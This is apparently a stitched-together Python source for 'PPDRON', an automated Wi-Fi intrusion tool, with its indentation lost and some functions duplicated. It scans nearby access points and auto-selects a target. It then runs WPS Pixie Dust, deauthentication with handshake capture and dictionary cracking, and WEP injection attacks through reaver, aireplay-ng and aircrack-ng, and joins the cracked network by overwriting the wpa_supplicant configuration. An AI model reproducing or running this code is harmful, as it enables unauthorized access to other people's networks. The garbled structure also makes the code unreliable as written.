def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
report.saveLog("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(
settings.INTERFACE, settings.TARGET_ESSID,
settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if 'Error' in line:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
'"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(
['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
settings.INTERFACE
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(4)
def run(self):
info("Running Pixie Dust attack...")
report.saveLog("Running Pixie Dust attack...")
cmd_reaver = pexpect.spawn(
'reaver -i {0} -c {1} -b {2} -vv -K 1'.format(
settings.INTERFACE_MON, settings.TARGET_CHANNEL,
settings.TARGET_BSSID))
cmd_reaver.logfile = open(settings.LOG_FILE, 'wb')
cmd_reaver.expect(
['WPA PSK:', 'WPS pin not found!', pexpect.TIMEOUT, pexpect.EOF],
30)
cmd_reaver.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
if 'WPA PSK:' in line:
key_reg = re.split("('.*?')|(\".*?\")", line)
key_filter = key_reg[1].replace("'", "")
settings.TARGET_KEY = key_filter
break
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Pixie Dust attack failed!")
report.saveLog("Pixie Dust attack failed!")
def check_interfering_processes(kill=True):
s = subprocess.Popen(['airmon-ng', 'check', 'kill' if kill else None], stdout=subprocess.DEVNULL)
_, err = s.communicate()
if err is not None:
error('Error when killing interfering processes!')
report.saveLog('Error when killing interfering processes!')
return False
return True
def check(self):
dep = 'aircrack-ng'
if subprocess.call(["which", dep],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
error("Required binary for {bin} not found.".format(bin=dep))
report.saveLog(
"Required binary for {bin} not found.".format(bin=dep))
return False
else:
return True
def check(self):
deps = ["aircrack-ng", "pyrit"]
for d in deps:
if subprocess.call(["which", d],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
error("Required binary for {bin} not found.".format(bin=d))
report.saveLog(
"Required binary for {bin} not found.".format(bin=d))
return False
return True
def run(self):
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'PPDRON_attack',
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
info(
"Trying to get the handshake (sending deauthentication packets...)"
)
report.saveLog(
"Trying to get the handshake (sending deauthentication packets...)"
)
cmd_aireplay = pexpect.spawn('aireplay-ng -0 10 -a {0} {1}'.format(
settings.TARGET_BSSID, settings.INTERFACE_MON))
time.sleep(10)
cmd_aireplay.close()
time.sleep(settings.WPA_EXPECT_HANDSHAKE_TIME)
cmd_pyrit = pexpect.spawn('pyrit -r PPDRON_attack-01.cap analyze')
cmd_pyrit.logfile = open(settings.LOG_FILE, 'wb')
cmd_pyrit.expect(['No valid', 'good', pexpect.TIMEOUT, pexpect.EOF])
cmd_pyrit.close()
handshake = True
parse_log_pyrit = open(settings.LOG_FILE, 'r')
for line in parse_log_pyrit:
if "No valid" in line:
warn("We couldn't get the handshake :-(")
report.saveLog("We couldn't get the handshake :-(")
handshake = False
parse_log_pyrit.close()
os.remove(settings.LOG_FILE)
if handshake != False:
info("We have something :-) Making a dictionary attack...")
report.saveLog(
"We have something :-) Making a dictionary attack...")
cmd_crack = pexpect.spawn(
'aircrack-ng -w dictionary_wpa2 PPDRON_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(
['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF])
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
wh = line.find('KEY FOUND!')
if wh > -1:
key_end = line.find(']')
settings.TARGET_KEY = line[wh + 13:key_end]
break
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Dictionary attack failed!")
report.saveLog("Dictionary attack failed!")
def get_current_essid():
iwc = subprocess.Popen(['iwconfig', settings.INTERFACE],
stdout=subprocess.PIPE)
hea = subprocess.Popen(['head', '-1'],
stdin=iwc.stdout,
stdout=subprocess.PIPE)
gre = subprocess.Popen(['grep', '-oP', '\".+\"'],
stdin=hea.stdout,
stdout=subprocess.PIPE)
sout, serr = gre.communicate()
if serr is not None:
error("Error getting the current ESSID")
report.saveLog("Error getting the current ESSID")
return ""
return sout.decode().strip().replace("\"", "")
def toggle_mode_monitor(setting=True):
if setting:
check_interfering_processes(kill=True)
subprocess.Popen(['airmon-ng', 'start', settings.INTERFACE], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
proc = Popen(['iwconfig'], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
for line in proc.communicate()[0].decode().split('\n'):
if 'Mode:Monitor' in line:
settings.INTERFACE_MON = line.split()[0]
return True
else:
error("Could not set interface in monitor mode!")
report.saveLog("Could not set interface in monitor mode!")
exit(1)
else:
subprocess.call(['airmon-ng', 'stop', settings.INTERFACE_MON], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def banner():
global version
from pyfiglet import figlet_format
b = figlet_format(' PPDRON') + \
''' Diego Sierra - Gerente - SQA
Andrea Velandia - Analista - Tester
Larry Portocarrero - Diseñador - Programador
'''
report.saveLog('PPDRON')
report.saveLog('Diego Sierra - Gerente - SQA')
report.saveLog('Andrea Velandia - Analista - Tester')
report.saveLog('Larry Portocarrero - Diseñador - Programador')
print(b)
def main():
banner()
report.initLog()
report.initReport()
if not checks.check_root():
error('You need root privileges to run PPDRON!\n')
report.saveLog('You need root privileges to run PPDRON!\n')
generateReport()
exit(1)
if not checks.check_wlan_tools_dependencies():
generateReport()
exit(1)
args = parse_args()
settings.OS_PATH = os.getcwd()
settings.INTERFACE = args.interface if args.interface is not None else settings.INTERFACE
settings.INTERFACE = device_mgr.get_ifaces(
)[0] if settings.INTERFACE is None else settings.INTERFACE
settings.DELAY = args.delay if args.delay is not None else settings.DELAY
settings.TARGET_ESSID = args.essid if args.essid is not None else settings.TARGET_ESSID
settings.TARGET_KEY = args.key if args.key is not None else settings.TARGET_KEY
delay = float(settings.DELAY) * 60
time.sleep(delay)
report.saveLog('PPDRON running...')
info('PPDRON running...')
if settings.TARGET_ESSID is not None:
if settings.TARGET_KEY is not None:
ap_target = None
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
else:
device_mgr.hardware_setup()
ap_target = airodump.scan_targets()
# -------------------- Infiltrate wifi ------------------------------------------------
if ap_target is not None:
settings.TARGET_ESSID = ap_target.get('ESSID').strip()
settings.TARGET_BSSID = ap_target.get('BSSID').strip()
settings.TARGET_CHANNEL = ap_target.get('channel').strip()
settings.TARGET_PRIVACY = ap_target.get('Privacy').strip()
info('Target selected: ' + settings.TARGET_ESSID + ' Channel: ' +
settings.TARGET_CHANNEL + ' Privacy: ' + settings.TARGET_PRIVACY)
report.saveLog('Target selected: ' + settings.TARGET_ESSID +
' Channel: ' + settings.TARGET_CHANNEL + ' Privacy: ' +
settings.TARGET_PRIVACY)
if settings.TARGET_PRIVACY == 'WEP':
report.TARGET_ATTACK = 'Fuerza bruta'
info('Cracking {e} access point with WEP privacy...'.format(
e=settings.TARGET_ESSID))
report.saveLog(
'Cracking {e} access point with WEP privacy...'.format(
e=settings.TARGET_ESSID))
wep_modules = find_modules('wep')
for wep_module in wep_modules:
attack = import_module(wep_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info('Key found!: {k} '.format(k=settings.TARGET_KEY))
report.saveLog(
'Key found!: {k} '.format(k=settings.TARGET_KEY))
lan_mgr.save_key()
break
else:
pass
if settings.TARGET_KEY is None:
error('Key not found! :-(')
report.saveLog(
'Key found!: {k} '.format(k=settings.TARGET_KEY))
generateReport()
exit(0)
elif settings.TARGET_PRIVACY == 'WPA' or settings.TARGET_PRIVACY == 'WPA2' or settings.TARGET_PRIVACY == 'WPA2WPA' or settings.TARGET_PRIVACY == 'WPA2 WPA':
info('Cracking {e} access point with {p} privacy...'.format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
report.saveLog(
'Cracking {e} access point with {p} privacy...'.format(
e=settings.TARGET_ESSID, p=settings.TARGET_PRIVACY))
wps = wash.wash_scan()
if wps:
info('WPS is enabled')
report.saveLog('WPS is enabled')
wps_modules = find_modules('wps')
for wps_module in wps_modules:
attack = import_module(wps_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
report.TARGET_ATTACK = 'Ataque al WPS'
info('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.saveLog('Key found!: {k} '.format(
k=settings.TARGET_KEY))
break
else:
pass
if settings.TARGET_KEY is None:
if wps:
warn(
'PIN not found! :-( Running WPA/WPA2 attack modules...'
)
report.saveLog(
'PIN not found! :-( Running WPA/WPA2 attack modules...'
)
wpa_modules = find_modules('wpa')
for wpa_module in wpa_modules:
attack = import_module(wpa_module[0])
if attack.check():
attack.setup()
attack.run()
if settings.TARGET_KEY is not None:
info('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.saveLog('Key found!: {k} '.format(
k=settings.TARGET_KEY))
report.TARGET_ATTACK = 'Ataque de diccionario'
break
else:
pass
if settings.TARGET_KEY is None: # still...
error('Key not found! :-(')
report.saveLog('Key not found! :-(')
generateReport()
exit(0)
else:
lan_mgr.save_key()
else:
info('Open network!')
report.saveLog('Open network!')
report.TARGET_ATTACK = 'Ninguno'
info('PPDRON has finished! Good bye! ;)')
report.saveLog('PPDRON has finished! Good bye! ;)')
generateReport()
def run(self):
proc_airodump = subprocess.Popen([
'airodump-ng', '--bssid', settings.TARGET_BSSID, '-c',
settings.TARGET_CHANNEL, '-w', 'PPDRON_attack',
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
info("Running an association & packet injection attack")
report.saveLog("Running an association & packet injection attack")
cmd_auth = pexpect.spawn(
'aireplay-ng -1 0 -e "{0}" -a {1} -h {2} {3}'.format(
settings.TARGET_ESSID, settings.TARGET_BSSID, settings.NEW_MAC,
settings.INTERFACE_MON))
cmd_auth.logfile = open(settings.LOG_FILE, 'wb')
cmd_auth.expect(
['Association successful', pexpect.TIMEOUT, pexpect.EOF], 20)
cmd_auth.close()
parse_log_auth = open(settings.LOG_FILE, 'r')
for line in parse_log_auth:
if line.find('Association successful') != -1:
info("Association successful :-) injecting packets...")
report.saveLog(
"Association successful :-) injecting packets...")
parse_log_auth.close()
os.remove(settings.LOG_FILE)
proc_aireplay = subprocess.Popen([
'aireplay-ng', '-3', '-e', '"' + settings.TARGET_ESSID + '"', '-b',
settings.TARGET_BSSID, '-h', settings.NEW_MAC,
settings.INTERFACE_MON
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(settings.WEP_AIREPLAY_TIME)
cmd_crack = pexpect.spawn('aircrack-ng PPDRON_attack-01.cap')
cmd_crack.logfile = open(settings.LOG_FILE, 'wb')
cmd_crack.expect(
['KEY FOUND!', 'Failed', pexpect.TIMEOUT, pexpect.EOF], 30)
cmd_crack.close()
parse_log_crack = open(settings.LOG_FILE, 'r')
for line in parse_log_crack:
wh = line.find('KEY FOUND!')
if wh > -1:
if 'ASCII' in line:
wh2 = line.find('ASCII')
key_start = 'ASCII('
key_end = line.find(')')
settings.TARGET_KEY = line[wh2 + len(key_start):key_end]
else:
key_start = 'KEY FOUND!'
key_end = line.find(']')
settings.TARGET_KEY = line[wh +
len(key_start):key_end].strip(
) # 13 (?)
parse_log_crack.close()
os.remove(settings.LOG_FILE)
if settings.TARGET_KEY is None:
warn("Attack failed!")
report.saveLog("Attack failed!")
def connect_to_lan():
import fcntl
import struct
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tries = 0
if settings.INTERFACE_MON is not None:
device_mgr.toggle_mode_monitor(False)
time.sleep(1)
def do_connect():
nonlocal sock
nonlocal tries
info("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
report.saveLog("Connecting to '{0}' with key '{1}'".format(
settings.TARGET_ESSID,
settings.TARGET_KEY if settings.TARGET_KEY is not None else ''))
cmd_connect = pexpect.spawn(
'iwconfig {0} essid "{1}" key s:{2}'.format(
settings.INTERFACE, settings.TARGET_ESSID,
settings.TARGET_KEY))
cmd_connect.logfile = open(settings.LOG_FILE, 'wb')
cmd_connect.expect(['Error', pexpect.TIMEOUT, pexpect.EOF], 3)
cmd_connect.close()
parse_log_connect = open(settings.LOG_FILE, 'r')
for line in parse_log_connect:
if 'Error' in line:
wpa_supplicant = open(
'/etc/wpa_supplicant/wpa_supplicant.conf', 'w')
wpa_supplicant.write(
'ctrl_interface=/var/run/wpa_supplicant\n')
wpa_supplicant.write('network={\n')
wpa_supplicant.write('ssid="' + settings.TARGET_ESSID + '"\n')
wpa_supplicant.write('key_mgmt=WPA-PSK\n')
wpa_supplicant.write('psk="' + settings.TARGET_KEY.strip() +
'"\n')
wpa_supplicant.write('}')
wpa_supplicant.close()
subprocess.call(['ifconfig', settings.INTERFACE, 'down'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['dhclient', settings.INTERFACE, '-r'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(['ifconfig', settings.INTERFACE, 'up'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call(
['iwconfig', settings.INTERFACE, 'mode', 'managed'])
subprocess.call(['killall', 'wpa_supplicant'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
subprocess.call([
'wpa_supplicant', '-B', '-c',
'/etc/wpa_supplicant/wpa_supplicant.conf', '-i',
settings.INTERFACE
],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(2)
parse_log_connect.close()
os.remove(settings.LOG_FILE)
tries += 1
subprocess.call(['dhclient', settings.INTERFACE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
time.sleep(4)
do_connect()
if get_current_essid() != settings.TARGET_ESSID and tries < 5:
warn('Connection to {e} failed. Retrying.'.format(
e=settings.TARGET_ESSID))
report.saveLog('Connection to {e} failed. Retrying.'.format(
e=settings.TARGET_ESSID))
do_connect()
if get_current_essid() == settings.TARGET_ESSID:
ipaddr = socket.inet_ntoa(
fcntl.ioctl(
sock.fileno(), 0x8915,
struct.pack('256s', bytes(settings.INTERFACE[:15],
'utf-8')))[20:24])
info('Connection to {e} succeeded! Our IP is: {i}'.format(
e=settings.TARGET_ESSID, i=ipaddr))
report.saveLog('Connection to {e} succeeded! Our IP is: {i}'.format(
e=settings.TARGET_ESSID, i=ipaddr))
settings.IP_LAN = ipaddr.strip()
else:
error('Could not connect to {e} after 5 tries. Aborting'.format(
e=settings.TARGET_ESSID))
report.saveLog(
'Could not connect to {e} after 5 tries. Aborting'.format(
e=settings.TARGET_ESSID))
exit(1)
def scan_targets():
"""
Scans the surrounding networks for a predefined amount of time.
Orders the found APs by power, and then returns the one with most IV captured (or the specified network in the essid parameter)
The AP is represented by a dict, in the form:
{'Privacy': 'WPA2 WPA', 'Authentication': 'PSK', 'channel': '1', 'ESSID': 'The Beardhouse', 'LAN IP': '0. 0. 0. 0', 'First time seen': '2015-12-15 04:10:22', 'Speed': '54', 'IV': '0', 'beacons': '25', 'ID-length': '14', 'Cipher': 'CCMP TKIP', 'Power': '-63', 'Last time seen': '2015-12-15 04:10:31', 'Key': '', 'BSSID': '38:60:77:A4:68:A1'}
Notice that the keys are mapped to airodump-ng column names, EXCEPT for 'beacons' and 'IV'
:param iface_mon: Monitoring interface with which to scan
:param essid: If supplied, it gets the airodump information for this particular ESSID
"""
info("Scanning {t} seconds for target WiFi access points...".format(
t=settings.AIRODUMP_SCAN_TIME))
report.saveLog(
"Scanning {t} seconds for target WiFi access points...".format(
t=settings.AIRODUMP_SCAN_TIME))
# Delete old files:
if os.path.exists(os.path.join(settings.OS_PATH, 'PPDRON-01.csv')):
os.remove(os.path.join(settings.OS_PATH, 'PPDRON-01.csv'))
os.remove(os.path.join(settings.OS_PATH, 'PPDRON-01.cap'))
os.remove(os.path.join(settings.OS_PATH, 'PPDRON-01.kismet.csv'))
os.remove(os.path.join(settings.OS_PATH, 'PPDRON-01.kismet.netxml'))
cmd_airodump = pexpect.spawn(
'airodump-ng -w PPDRON {i}'.format(i=settings.INTERFACE_MON))
cmd_airodump.expect([pexpect.TIMEOUT, pexpect.EOF],
settings.AIRODUMP_SCAN_TIME)
cmd_airodump.close()
with open(os.path.join(settings.OS_PATH, 'PPDRON-01.csv'), 'r') as f:
f.readline() # skip empty line
header = list(f.readline().split(', '))
header = list(map(lambda x: x.replace('# ', '').strip(),
header)) # cleanup
d = csv.DictReader(f,
delimiter=',',
skipinitialspace=True,
fieldnames=header)
aps = []
for e in d:
if e.get('Power') is not None:
aps.append(e)
else:
# Nearing the end, there's the stations list,
# for which we don't care right now
break
if len(aps) == 0:
error("No WiFi networks in range! Nothing we can do.")
report.saveLog("No WiFi networks in range! Nothing we can do.")
exit(1)
if settings.TARGET_ESSID is None:
for ap in aps:
if '00' in ap.get('ESSID'):
aps.remove(ap)
aps = sorted(aps, key=lambda x: x.get('Power'))
# From the top 2, get the one with most IV
return sorted(aps[:2], key=lambda x: x.get('IV'), reverse=True)[0]
else:
ap_defined = None
for ap in aps:
if ap.get('ESSID') == settings.TARGET_ESSID:
ap_defined = ap
break
if ap_defined is not None:
return ap_defined
else:
error("AP Target not found! Ending...")
report.saveLog("AP Target not found! Ending...")
exit(1)
def hardware_setup():
info("Setting interface to monitor mode")
report.saveLog("Setting interface to monitor mode")
toggle_mode_monitor(True)
mac_changer()
